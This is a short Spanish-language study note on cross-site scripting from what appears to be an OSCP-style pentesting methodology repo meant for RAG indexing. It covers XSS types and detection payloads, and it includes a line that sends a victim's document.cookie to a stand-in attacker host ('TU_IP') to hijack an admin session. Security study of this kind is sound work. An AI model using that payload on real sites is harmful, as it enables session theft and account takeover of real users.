El repo trae ahora ~73 docs de metodologia de pentesting (estilo OSCP, scrubeados de datos personales) que indexa.py indexa: un clon recien hecho ya sabe de enumeracion, explotacion web, shells, privesc, Active Directory, cracking... con los comandos, sin ningun dato privado. docs/rag.md lo refleja.
28 lines
1.1 KiB
Markdown
28 lines
1.1 KiB
Markdown
# XSS (Cross-Site Scripting)
|
|
|
|
> Inyectas JavaScript que se ejecuta en el navegador de otro usuario. En OSCP pesa menos que SQLi/RCE, pero aparece (sobre todo para robar sesión de un admin). Vector de Hacking web.
|
|
|
|
## Tipos
|
|
```
|
|
Reflected → tu payload vuelve en la respuesta de ESA petición (?q=<script>...)
|
|
Stored → se guarda (comentario, perfil) y se dispara a quien lo vea (más potente)
|
|
DOM → el JS del cliente mete tu input en el DOM sin sanear
|
|
```
|
|
|
|
## Detección y payloads
|
|
```html
|
|
<script>alert(1)</script>
|
|
<img src=x onerror=alert(document.domain)>
|
|
"><svg onload=alert(1)>
|
|
```
|
|
Prueba primero un marcador inofensivo y mira si se **renderiza** o se escapa (en Burp Repeater e Intruder).
|
|
|
|
## Para qué sirve en OSCP
|
|
- **Robar la cookie de sesión** de un admin (XSS stored en un panel que el admin revisa):
|
|
```html
|
|
<script>new Image().src='http://TU_IP/c='+document.cookie</script>
|
|
```
|
|
La recibes en tu `python3 -m http.server` → la usas en Authentication attacks.
|
|
- A veces el panel admin tiene una función que escala a RCE / File upload bypass.
|
|
|
|
Relacionado: SSTI · Authentication attacks · OSCP MOC
|